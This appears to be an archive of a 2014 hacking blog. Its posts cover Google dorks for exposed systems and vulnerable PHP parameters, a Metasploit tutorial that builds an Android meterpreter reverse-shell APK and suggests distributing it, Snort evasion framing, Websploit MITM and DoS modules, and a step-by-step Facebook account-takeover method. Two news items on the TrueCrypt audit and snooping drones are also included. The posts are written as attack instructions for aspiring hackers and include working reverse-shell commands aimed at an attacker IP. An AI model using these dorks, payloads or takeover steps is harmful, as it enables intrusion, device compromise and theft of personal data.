Wednesday, 9 July 2014

Google Hacking Tutorials.

Readers, I introduce a little about a very interesting technique that is Google Hacking, is a key to investigate if we are doing a pentest, or protecting our organization or individual item. Google Hacking is the activity of using the site search capabilities, aiming to attack or better protect information of a company. The information available on the company’s web servers are likely to be in the databases of Google.

INTRODUCTION
Explaining… A misconfigured server may expose several business information on Google. It is difficult to get access to files from database sites through Google. We can use as an example, the use of “cache” Google, where it stores older versions of all sites that were once indexed by their robots. This feature allows you to have access to pages that have already been taken from the air, since they already exist in the database of Google.

EVOLUTION OF THOUGHT
Let’s imagine that at some point in the history of an organization’s site, a more sensitive information was available. After a while, the webmaster has been alerted that information removed from the site. However, if the page on the site has already been indexed by Google, it is possible that even having been altered or removed, can still access it using the Google cache feature. A simple example of what we can find on Google, and you can come back to haunt the person who provided such information online is as follows: type in the search box cpf + curriculum. Certainly will return multiple results with links where we can find full name, address, phone, social security number, identity and some more information from people who publish their data on the internet. Having knowledge of how these data can be used in a malicious way, we can be more aware to publish any information on our internet.

COMMANDS TO USE GOOGLE

intitle, allintitle
Search content in title (tag title) of the page .
When using the intitle command, it is important to pay attention to the syntax of the search string, since the word that follows soon after the intitle command is regarded as the search string. The “allintitle” breaks this rule, telling Google that all the words that follow are to be found in the title of the page, so this last command is more restrictive.

inurl, allinurl
Find text in a URL. As explained in the intitle operator may seem a relatively simple task using the inurl operator without giving more attention to it. But we must bear in mind that a URL is more complicated than a simple title, and operation of the inurl operator can also be complex. Just as the intitle operator, inurl operator also has a companion who is allinurl , which works identically and restrictively, showing results only when all the strings were found.

Filetype
Search for a particular type of file. Google search more than just web pages. You can search many different file types, including PDF (Adobe Portable Document Format) and Microsoft Office. The filetype operator can assist you in finding specific types of files . More specifically, we can use this operator to search for pages ending in a particular extension.

Allintext
Finds a string of text within a page. The allintext operator is perhaps the simplest to use as it performs the function of most known search engines like : locate the term in the page text. Although this operator can be used for broad opinion, is useful when you know that the search string can only be found in the page text. Using allintext operator can also serve as a shortcut to find the string anywhere, except in the title, URL and links.

Site
Directs the research to the content of a particular website. Although technically a part of the URL, the address ( or domain name ) of a server can be better researched with the website operator. The site allows you to search only the pages that are hosted on a particular server or domain.

Link
Searching for links to a given page. Instead of providing a search term, the operator needs a URL link or server name as an argument.

Inanchor
This operator can be regarded as a companion to the link operator, since both seek links. The inanchor operated , however , search the text representation of a link , not the current URL. Inanchor accepts a word or expression as argument, as inanchor:click ou inanchor:oys. This type of search is useful especially when we began to study ways to look for correlations between sites.

Daterange
Search for pages published within a “range” of dates.
You can use this operator to find pages indexed by Google in a given date range. Every time Google crawls a page, the date in your database is changed. If Google finds some dark Web site, you can happen to index it only once and never return to it. If you find that your searches are clogged with these types of dark pages, you can remove them from your search (and more updated results) through the effective use of daterange operator.

Cache
Shows the version of a given page cache. As discussed, Google keeps “snapshots” of pages indexed, and that we can access via the cached link on the search results page. If you want to go straight to the online version of a page cache , without first making a query to Google to get the cached link on the results page, you can simply use the cache operator in a query.

Info
Existing content shows the summary of information from Google. The operator info shows the summary information of a site and provides links to other Google searches that may belong to this site. Informed of this operator parameter must be a valid URL.

HOW TO USE GOOGLE

Searching for files database on government websites:
site:gov.pl

Searching for a specific server
inurl:”powered by” site:test.com

Search search files in email format . MDB
inurl:e-mail filetype:mdb

This research seeks phones available on the intranet found Google
nurl:intranet + intext:”phone”

Conducting research in this way it is possible to identify many of subdomains Oracle
site:oracle.com -site:www.oracle.com
Detecting systems using port 8080

inurl:8080 -intext:8080

Finding VNC

intitle:VNC inurl:5800 intitle:VNC

Finding VNC

intitle:”VNC Viewer for Java”

Finding Active Webcam

“Active Webcam Page” inurl:8080

Finding Apache 1.3.20 :

“Apache/1.3.20 server at” intitle:index.of

Asterisk VOIP Flash Interface

intitle:”Flash Operator Panel” -ext:php -wiki -cms -inurl:as

Possible flaws in web applications :

allinurl:”.php?site=”
allinurl:”.php?do=”
allinurl:”.php?content=”
allinurl:”.php?meio=”
allinurl:”.php?produto=”
allinurl:”.php?cat=”

Readers could continue citing many “google dorks” but I specified the most important, google can help them find the other… It is worth mentioning the importance of this research to test tool is the best search engine today.

CONCLUSION
Google has many features that can be used during a penetration test, and rightfully so is considered the best tool for hackers because it allows access to any type of information you want. Google is the main tool for collecting information from our target. It is the best one to use the public system for information about anything regarding our target: sites, advertisements, partners, social networks, groups, etc.

Google Hacking Author

Monday, 19 May 2014

Hacking Android Smartphone Tutorial ( Easy Way )

Nowadays mobile users are increasing day by day, the security threat is also increasing together with the growth of its users. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit. Why we choose android phone for this tutorial? simply because lately android phone growing very fast worldwide. Here in China you can get android phone for only US$ 30 it's one of the reason why android growing fast.
What is android? according to wikipedia:

Android is an operating system based on the Linux kernel, and designed primarily for touchscreen mobile devices such as smartphones and tablet computers. Initially developed by Android, Inc., which Google backed financially and later bought in 2005, Android was unveiled in 2007 along with the founding of the Open Handset Alliance: a consortium of hardware, software, and telecommunication companies devoted to advancing open standards for mobile devices.
and what is APK? according to wikipedia:

Android application package file (APK) is the file format used to distribute and install application software and middleware onto Google's Android operating system; very similar to an MSI package in Windows or a Deb package in Debian-based operating systems like Ubuntu.
Here is some initial information for this tutorial:
Attacker IP address: 192.168.8.94
Attacker port to receive connection: 443

Requirements:

1. Metasploit framework (we use Kali Linux 1.0.6 in this tutorial)

2. Android smartphone (we use HTC One android 4.4 KitKat)


Step by Step Hacking Android Smartphone Tutorial using Metasploit:

1. Open terminal (CTRL + ALT + T) view tutorial how to create linux keyboard shortcut.
2. We will utilize Metasploit payload framework to create exploit for this tutorial.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>
As described above that attacker IP address is 192.168.8.94, below is our screenshot when executed the command

Hacking Android Smartphone Tutorial using Metasploit

3. Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsole to go to Metasploit console.

Hacking Android Smartphone Tutorial using Metasploit

Info:
use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3.

Hacking Android Smartphone Tutorial using Metasploit

Info:
set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection
5. Attacker already have the APK's file and now he will start distribute it (I don't need to describe how to distribute this file, internet is the good place for distribution :-) ).

6. Short stories the victim (me myself) download the malicious APK's file and install it. After victim open the application, attacker Metasploit console get something like this:

Hacking Android Smartphone Tutorial using Metasploit

7. It's mean that attacker already inside the victim android smartphone and he can do everything with victim phone.

Hacking Android Smartphone Tutorial using Metasploit

Thursday, 15 May 2014

Evade A Network Intrusion Detection System (NIDS) Using Snort.

Welcome back, my fledgling hackers!

Nearly every commercial enterprise worth hacking has an intrusion detection system (IDS). These network intrusion detection systems are designed to detect any malicious activity on the network. That means you!
As the name implies, a network intrusion detection system (NIDS) is intended to alert the system administrator of network-based intrusions. As a hacker, the better we understand how these NIDS work, the better we can evade them and stealthily enter and exit a network without detection. In an attempt to train you to evade these systems, I am beginning new series on how NIDS work.


Introducing Snort: Our NIDS of Choice

Snort is an open-source NIDS that is the most widely used NIDS in the world. Some estimate its market share at over 60%. It's used by such large organizations as Verizon, AT&T, the U.S. State Department, most U.S. military bases, and millions of medium to large businesses around the globe. Last month (July 2013), Cisco announced that they would be acquiring the parent company of Snort, Sourcefire Inc. of Columbia, MD. This insures that Snort will remain the dominant NIDS on the planet for some time to come, making it increasingly important that we understand Snort—so we can evade it.
Fortunately, Snort is built into our BackTrack, so we don't need to install it. If you do need to download it, you can find it here.

Step 1: Fire Up Snort

Snort is basically a network traffic sniffer that can apply rules to the traffic it sees to determine whether it contains malicious traffic. We can start Snort in sniffer mode by opening any terminal in BackTrack and typing:
  • snort -vde
After we hit enter, we begin to see packets going past the screen in rapid succession. Snort is simply sniffing packets from the wire and displaying them to us.
To stop Snort, hit the Control C. When we stop Snort, it displays our statistics on the packet capture.

Step 2: Intrusion Detection Mode

To get Snort to operate in Intrusion Detection (IDS) mode, we need to get Snort to use its configuration file. Nearly all applications in Linux are controlled by a configuration file that is a simple text file. This same applies to Snort. Snort's configuration file is named snort.conf and is usually found at /etc/snort/snort.conf. So, to get Snort to use its configuration file, we need to start it with:
  • snort -vde -c /etc/snort/snort.conf
Where -c says use the configuration file, and /etc/snort/snort.conf is the location of the configuration file.
When Snort starts in IDS mode, we begin to see a screen similar to that below. Eventually, the screen will stop scrolling and Snort will begin to watch your network traffic.
Now Snort is sniffing our wire and will alert when something malicious appears!

Step 3: Configuring Snort

Snort comes with a default configuration file that, for the most part, will work with little editing. The configuration has plenty of comments to explain what each line and section does, so you can figure it out with little outside assistance.
Their are at least 3 areas, though, that need some attention and configuring...
  1. The EXTERNAL_NET variable
  2. The HOME_NET variable
  3. The path to the Snort rules
Without the Snort rules, Snort is just a sniffer/packet logger, far from the powerful IDS it can be. That being said, let's get inside that Snort configuration file and make the minimum changes to get Snort to run as an effective IDS.
Let's open the snort configuration file with KWrite.
  • kwrite /etc/snort/snort.conf
As you can see in the screenshot above, the configuration file is comprised of six (6) sections.
  1. Set the variables on your network
  2. Configure dynamic loaded libraries
  3. Configure preprocessors
  4. Configure output plugins
  5. Add any runtime config directives
  6. Customize your rule set
We need to first set the variables for our internal and external network. These are defined by the lines:
  • var HOME_NET
  • var EXTERNAL_NET
We can define our HOME_NET as the IP address or subnet we're trying to protect. You see in the screenshot that it's set as "any." This will work, but it's not optimal for detecting malicious activity. We should set the HOME_NET to our internal IP address, such as 192.168.1.1, or our internal subnet, such as 192.168.1.0/24.
In most cases, security admins will define their EXTERNAL_NET as everything that is NOT their HOME_NET. To accomplish this, we can simply negate (!) the HOME_NET or ! HOME_NET.
Next, we need to set our path to our rules. As we can see in the screenshot below, about two-thirds of the way down, there is:
  • var RULE_PATH /etc/snort/rules
In most installations, this path will be correct (but does vary with different installations) and we can simply leave it as is, but make certain that your rules are in this path before assuming so. When you are done, simply save the snort.conf file.

Step 4: Checking the Snort Rules

We can navigate to the rules directory by typing these two commands:
  • cd /etc/snort/rules
  • ls -l
In this way, we can see all of the files that comprise our Snort rules. It's these Snort rules that are designed to catch intrusions and alert the security admin.
In my next tutorial in this series, we will examine these rules and how they work to catch intrusions. The better we understand these Snort rules, the better we able to evade them!

Saturday, 3 May 2014

WEBSPLOIT TUTORIAL MITM ATTACK ::: KALI LINUX



Websploit is an automatic vulnerability assessment, web crawler and exploiter tool. It is an open source command line utility that composed on modular structure. At the time of writing, there are 16 modules are available on Websploit, it can be downloaded from sourceforge project website but it is available on Kali Linux by default.





Websploit can be synchronize with Metasploit WMAP project for web vulnerability scanning, there are four categories of modular are available and they are:


  • Web Modules
  • Network Modules
  • Exploit Modules
  • Wireless Modules


In Wireless module we can run some interesting WiFi attacking vector including the WiFi jammer and WiFi DDOS attack. For exploitation, websploit is working on the basis of Metasploit Autopwn service and metasploit browser autopwn service. A large number of interesting attacking vectors are available on the network modules, and they are but not limited to:


  • ARP cache DOS attack
  • Middle Finger Of Doom Attack
  • Man In The Middle Attack
  • Man Left In The Middle Attack
  • Fake Update Attack Using DNS Spoof
  • And more....


Some modules of websploit are depends on Metasploit for example


  • Information Gathering From Victim Web Using (Metasploit Wmap)


So it is recommended to configure Metasploit before using these modules, the demonstration of every modules are not possible on this single article, but the basic command and usage of the software mentioned below and it surely help you to use websploit in a professional manner.



If you are on Kali Linux, then click on Applications → Kali Linux → Web Applications → Web Vulnerability Scanners → Websploit







The list of commands that can applicable on websploit are:



Commands                   Description

---------------                  ----------------

set                              Set Value Of Options To Modules

scan                            Scan Wifi (Wireless Modules)

stop                            Stop Attack & Scan (Wireless Modules)

run                             Execute Module

use                             Select Module For Use

os                               Run Linux Commands(ex : os ifconfig)

back                           Exit Current Module

show modules            Show Modules of Current Database

show options              Show Current Options Of Selected Module

upgrade                     Get New Version

update                        Update Websploit Framework



In the demonstration mentioned below: the web directory scanner attack will be performed.





wsf > show modules



..

..

wsf > use web/dir_scanner

wsf:Dir_Scanner > show options


Options Value

--------- --------------

TARGET http://google.com


wsf:Dir_Scanner > set TARGET http://ehacking.net

TARGET => ehacking.net

wsf:Dir_Scanner > run

[*] Your Target : ehacking.net

[*]Loading Path List ... Please Wait ...

[index] ... [404 Not Found]

[images] ... [404 Not Found]

[download] ... [404 Not Found]

..

..

..


The commands to perform other attacking vector are same, just follow the steps mentioned above.

Wednesday, 16 April 2014

Truecrypt Encryption Tool Clears The First Phase Of Security Audit .



Is TrueCrypt Audited Yet? Yes, In Part! One of the world's most-used open source file encryption software trusted by tens of millions of users - TrueCrypt is being audited by a team of experts to assess if it could be easily exploited and cracked. Hopefully it has cleared the first phase of the audit and given a relatively clean bill of health.

TrueCrypt is a free, open-source and cross-platform encryption program available for Windows, OSX and Linux that can be used to encrypt individual folders or encrypt entire hard drive partitions including the system partition. 

The program is also capable to do some amazing things, such as can create a hidden operating system on a computer, essentially an OS within an OS where users can keep their most secret files.

EVERYONE HAS SOMETHING TO HIDE
TrueCrypt developers are anonymous and used the aliases “ennead” and “syncon”, perhaps to avoid unwelcome attention from their own governments. But when we talk about Privacy and Security, we can't trust anyone, especially when someone like NSA is out there.

This is a major reason that security community has took an initiative to perform a public Security Audit of TrueCrypt in response to the concerns that National Security Agency (NSA) may have tampered with it.

iSec Research Lab was contracted to carry out  public cryptanalysis and security audit of TrueCrypt by the cryptography community, Open Crypto Audit Project (OCAP) and they has ‪found “no evidence of backdoors or otherwise intentionally malicious code in the assessed areas.

11 VULNERABILITIES FOUND, BUT NOT CRITICAL
Auditors review more than 70,000 lines of TrueCrypt source code and architecture. Finally yesterday they have turned up 11 vulnerabilities in the full disk and file encryption software's source code, but no "high-severity" issues, which means nothing particularly found inappropriate and certainly nothing looks like a backdoor or intentional flaws.


According to the researchers, none of the vulnerabilities seems as an intentional flaw or immediate exploitation vectors, rather all of the identified findings appeared to be accidental.
TrueCrypt is Secure; Encryption Tool cleared the First Phase of Security Audit
Overall, iSEC does think changes can be made to improve code quality and maintainability, and that the build process should be updated to rely on recent tools with trustworthy provenance. In sum, while TrueCrypt does not have the most polished programming style, there is nothing immediately dangerous to report,” reads the audit report [PDF released on April 14].
These results are from the first phase of the audit, focused on the TrueCrypt bootloader and Windows kernel driver; architecture and code review.

PHASE 2 - CRYPTOGRAPHIC TESTS
Now, TrueCrypt is about to get a second phase exam that may hopefully give the software a clean bill of health too, because the project to audit TrueCrypt has raised tens of thousands of dollars to peer into TrueCrypt's deepest recesses. Second Phase test will include a thorough analysis of the various encryption cipher suites and  implementation of random number generators and critical key algorithms.

Wednesday, 2 April 2014

Hacking Facebook Account With Just A Text Message .



Can you ever imagine that a single text message is enough to hack any Facebook account without user interaction or without using any other malicious stuff like Trojans, phishing, keylogger etc. ?

Today we are going to explain you that how a UK based Security Researcher, "fin1te" is able to hack any Facebook account within a minute by doing one SMS.

Because 90% of us are Facebook user too, so we know that there is an option of linking your mobile number with your account, which allows you to receive Facebook account updates via SMS directly to your mobile and also you can login into your account using that linked number rather than your email address or username.
According to hacker, the loophole was in phone number linking process, or in technical terms, at file /ajax/settings/mobile/confirm_phone.php

This particular webpage works in background when user submit his phone number and verification code, sent by Facebook to mobile. That submission form having two main parameters, one for verification code, and second is profile_id, which is the account to link the number to.



As attacker, follow these steps to execute hack: 
  1. Change value of profile_id to the Victim's profile_id value by tampering the parameters.
  2. Send the letter F to 32665, which is Facebook’s SMS shortcode in the UK. You will receive an 8 character verification code back.
  3. Enter that code in the box or as confirmation_code parameter value and Submit the form.

Facebook will accept that confirmation code and attacker's mobile number will be linked to victim's Facebook profile.

In next step hacker just need to go to Forgot password option and initiate the password reset request against of victim's account.
Attacker now can get password recovery code to his own mobile number which is linked to victim's account using above steps. Enter the code and Reset the password!

Facebook no longer accepting the profile_id parameter from the user end after receiving the bug report from the hacker.

In return, Facebook paying $20,000 to fin1te as Bug Bounty.

Friday, 28 March 2014

Snoopy Drones Can Hack Your Smartphones .



The use of unmanned aerial vehicles (UAVS) called Drones is rapidly transforming the way we go to war. Drones were once used for land surveillance, Delivering Pizza's, then equipped with bombs that changed the way nations conduct war and now these hovering drones are ready to hack your Smartphones.


London-based Sensepoint security researchers have developed a drone called 'Snoopy' that can intercept data from your Smartphones using spoofed wireless networks, CNN Money reported.


The Drone will search for WiFi enabled devices and then using its built-in technology, it will see what networks the phones have accessed in the past and pretends to be one of those old network connections.


Spoofing WiFi networks that device has already accessed allows Snoopy Drone to connect with targeted Smartphone without authentication or interaction. In technical terms, The Drone will use 'Wireless Evil Twin Attack' to hack Smartphones.


Once connected, Snoopy Drone can access your WiFi enabled Smartphones, allowing the attacker to remotely capture login credentials, personal data, and more.




Snoopy is self-powered and extremely mobile and researchers have successfully stolen Amazon, PayPal, and Yahoo credentials while testing it out in the skies of London.


The collection of metadata, including Wireless Network Names and Device IDs is not illegal, but intercepting personal data would likely violate wiretapping and identity theft laws.


If the technology got in the hands of criminals, there are all kinds of things they could do. Researchers said they have no malicious intent in developing Snoopy Drone, they are demonstrating the technology to highlight how vulnerable Smartphone users can be.


WiFi hacking is very simple to execute and are becoming far more common these days. If you are concerned about such attacks, just turn off that automatic WiFi network-finding feature.